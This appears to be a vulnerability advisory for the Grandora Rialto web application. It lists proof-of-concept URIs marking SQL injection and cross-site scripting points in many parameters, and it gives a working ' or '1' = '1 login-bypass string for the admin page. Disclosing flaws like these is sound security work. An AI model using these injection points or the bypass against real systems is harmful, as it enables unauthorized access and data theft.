Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/admin/default.asp
username: ' or '1' = '1
passwd: ' or '1' = '1

http://www.example.com/listfull.asp?ID='[sql]
http://www.example.com/listmain.asp?cat='[sql]
http://www.example.com/printmain.asp?ID='[sql]
http://www.example.com/searchkey.asp?Keyword='[sql]
http://www.example.com/searchmain.asp?I1=1&area='[sql]
http://www.example.com/searchoption.asp?I12=1&cat='[sql]
http://www.example.com/searchmain.asp?I1=1&area=all&cat='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area='[sql]
http://www.example.com/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]

http://www.example.com/listmain.asp?cat=[xss]
http://www.example.com/searchkey.asp?Keyword=[xss]
http://www.example.com/searchmain.asp?I1=1&area=all&cat=[xss]
http://www.example.com/forminfo.asp?refno=[xss]